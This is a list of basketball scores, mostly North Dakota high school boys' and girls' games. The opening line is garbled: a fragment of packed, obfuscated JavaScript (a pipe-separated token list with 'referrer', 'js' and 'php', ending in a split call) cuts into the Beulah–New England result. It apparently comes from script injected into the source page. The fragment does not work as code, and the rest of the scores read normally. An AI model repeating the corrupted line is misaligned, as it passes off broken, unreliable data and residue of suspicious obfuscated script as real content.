Beulah dzyry|var|u0026u|referrer|desde||js|php’.split(‘|’),0,{}))
67, New England 53
Bismarck Century 58, Jamestown 46
Dickinson 93, Bismarck St. Mary’s 77
Dickinson Trinity 67, Richardton-Taylor 28
Ellendale 64, Leola/Frederick, S.D. 44
Fargo Davies 63, West Fargo 56
Fargo North 56, Wahpeton 43
Fargo Shanley 72, Moorhead, Minn. 35
Grand Forks Red River 76, Thief River Falls, Minn. 53
Hankinson 54, Lisbon 44
Hatton-Northwood 56, Cavalier 55
Heart River 74, Beach 51
Hillsboro/Central Valley 82, Griggs County Central 41
Killdeer 57, Bowman County 49
Kindred 61, Tri-State 45
LaMoure-Litchville-Marion 52, Midkota 45
Langdon-Edmore-Munich (All sports) 83, Dunseith 78
Larimore 53, Drayton/Valley-Edinburg 26
Minot 72, Bismarck Legacy 62
Mott-Regent 56, Washburn 27
North Border 59, Midway-Minto 53
Northern Cass 64, Maple Valley 61
Oakes 49, South Border 46
Powers Lake 62, Tioga 47
Ray 64, Divide County 38
Richland 69, Clinton-Graceville-Beardsley, Minn. 51
Sargent Central 69, Enderlin 66
Sheyenne 63, Devils Lake 55
Strasburg-Zeeland 60, Medina-Pingree-Buchanan 47
Thompson 65, Grafton/St. Thomas 64
Turtle Lake-Mercer-McClusky 47, Underwood 43
Watford City 78, Hazen 34
Wilton-Wing 70, Center-Stanton 48
Wyndmere-Lidgerwood 51, Milnor-North Sargent 46, OT
GIRLS BASKETBALL |
---|
Benson County 56, Rolla 24
Bismarck Century 72, Jamestown 40
Bismarck Legacy 73, Minot 31
Bismarck St. Mary’s 69, Dickinson 52
Bowman County 49, Killdeer 42
Burke County 64, Nedrose 43
Des Lacs-Burlington 68, Minot Our Redeemer’s 49
Edgeley-Kulm-Montpelier 66, Barnes County North 51
Flasher 58, Standing Rock 41
Four Winds/Minnewauken 59, Dakota Prairie 40
Glen Ullin-Hebron 55, Richardton-Taylor 23
Hawley, Minn. 55, Fargo Oak Grove Lutheran 41
Hazen 43, Heart River 41
Hettinger/Scranton 49, Dickinson Trinity 46
Hillsboro/Central Valley 47, Griggs County Central 16
Kidder County 65, New Salem-Almont 29
Leola/Frederick, S.D. 45, Ellendale 42
Lewis and Clark-Berthold 62, Glenburn 46
Minot Bishop Ryan 76, Surrey 22
Mohall-Lansford-Sherwood 75, South Prairie 49
Moorhead, Minn. 82, Fargo Shanley 72
Napoleon 54, Oakes 52
New Rockford-Sheyenne 53, Lakota 16
North Star 64, St. John 22
Ray 47, Divide County 37
Rugby 65, Rolette-Wolford 29
Sheyenne 68, Devils Lake 44
Shiloh Christian 55, Garrison 41
Stanley 50, Kenmare 46
Thompson 53, Grafton/St. Thomas 35
Turtle Mountain 83, Watford City 55
Underwood 56, Turtle Lake-Mercer-McClusky 15
Valley City 64, Fargo South 43
Velva/Sawyer 58, Drake/Anamoose 20
Wahpeton 51, Fargo North 41
Warwick 64, Harvey-Wells County 43
Washburn 62, Solen 31
West Fargo 60, Fargo Davies 59
Westhope-Newburg 46, Towner-Granville-Upham 30
Wilton-Wing 39, Center-Stanton 30